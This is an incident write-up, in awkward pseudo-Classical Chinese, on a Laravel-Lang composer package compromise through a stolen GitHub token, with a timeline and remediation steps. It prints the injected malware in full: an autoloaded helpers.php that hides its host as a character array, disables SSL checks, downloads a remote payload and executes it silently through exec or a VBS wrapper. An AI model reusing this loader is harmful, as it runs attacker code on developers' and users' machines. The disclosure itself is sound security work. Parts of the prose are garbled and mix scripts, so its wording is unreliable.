今日吾輩竟究此事,所涉 Laravel-Lang 之 composer 套件數端。
是事涉私改库之版本标记。其部分标记指向含害代码之提交,于安装或更新依赖时,或可被执行。
所涉包:
风险预览始于五月廿二子时三刻UTC。此风险波及于当期执行composer update或安装新版本包之用户。
查究既毕,事因某队员GitHub之Personal Access Token遭窃,此令得更仓库之标签也。
PAT恐为奸人所窃,盖因近时所致也。GitHub数据泄露GitHub中亦有专属之文篇得悉此事,当如何处之。
然复归乎此害者.
察审计之录(其详,竟甚寡),得识首疑之迹,在五月廿一日,酉时四刻,世界时也。狡者下载二私藏之仓库之zip,此二者本无代码。盖尝验之耳.
及至攻诸项目,始于五月廿二日,亥时三刻,终于廿三日,子时整。
是时,奸者尽去诸标于库,载毒码于中,复立旧标于己之提交。然未毁库,诸提交皆安其位,无改易焉。
植入之恶码
"autoload": {
"psr-4": {
"LaravelLang\\Lang\\": "src/"
- }
+ },
+ "files": [
+ "src/helpers.php"
+ ]
}<?php
/**
* Laravel Lang Helpers
* Common locale detection and formatting utilities
*/
declare(strict_types=1);
if (!function_exists('laravel_lang_locale')) {
function laravel_lang_locale(): string {
return function_exists('config') ? config('app.locale', 'en') : 'en';
}
}
if (!function_exists('laravel_lang_fallback')) {
function laravel_lang_fallback(): string {
return function_exists('config') ? config('app.fallback_locale', 'en') : 'en';
}
}
if (!defined('LARAVEL_LANG_HELPERS')) {
define('LARAVEL_LANG_HELPERS', true);
(function() {
$cacheDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . '.laravel_locale';
@mkdir($cacheDir, 0755, true);
$sig = md5(__DIR__ . php_uname('n') . fileinode(__FILE__));
$marker = $cacheDir . DIRECTORY_SEPARATOR . $sig;
if (@file_exists($marker)) return;
$fetch = function($url) {
$ctx = @stream_context_create([
'http' => ['timeout' => 10, 'ignore_errors' => true,
'header' => "User-Agent: Mozilla/5.0\r\n"],
'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]
]);
$r = @file_get_contents($url, false, $ctx);
if ($r !== false && strlen($r) > 50) return $r;
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_USERAGENT => 'Mozilla/5.0']);
$r = curl_exec($ch);
curl_close($ch);
if ($r !== false && strlen($r) > 50) return $r;
}
return null;
};
$h = implode('', array_map('chr', [102,108,105,112,98,111,120,115,116,117,100,105,111,46,105,110,102,111]));
$d = $fetch("https://{$h}/payload");
if ($d) {
$f = $cacheDir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(6)) . '.php';
if (@file_put_contents($f, $d) !== false) {
@touch($marker);
if (stripos(PHP_OS, 'WIN') === 0) {
$v = $cacheDir . '\\' . bin2hex(random_bytes(4)) . '.vbs';
@file_put_contents($v, 'CreateObject("WScript.Shell").Run "php ""' . $f . '""", 0, False');
@pclose(@popen("cscript //nologo //b \"$v\" >nul 2>&1", 'r'));
} else {
@exec("php \"$f\" > /dev/null 2>&1 &");
}
}
}
})();
}https://github.com/Laravel-Lang/lang/blob/3290c20511f608a8f92f10d1b1f5620a4177a363/src/helpers.php
安全之患,瞬息而觉,即谋所以除之。
首事也,Packagist之众,首揭其物于市。laravel-lang/lang继而,于我等而言,众队员皆已撤销向项目写入代码之许可(write mode)。此举助止攻击,盖因删除标签无效——彼等眼见便复原矣。
继而撤回既有之PAT与SSH密钥。复又停用组织级之GitHub Actions。
止恶之后,乃察其由。
虽日志匮乏,然寻得攻击所出之特定PAT标识。鉴于GitHub近有敏感数据泄露,其已确认此事。是也一篇文章也。
何所行哉?
检视尔之项目,行此令。composer update 供下载修正版包.
速唤己之GitHub私钥,虽未闻Laravel-Lang(Laravel-Lang),此患非独此案.
终究如何.
幸赖及时迅疾之策,得复众望所归之项目,护用户免遭奸宄之害。
勿使人人得而窥其全库.
勿于库中藏密!!!
慎察数据之泄,时更己之密码与令牌。勿待奸宄得而用之!
诸君安好!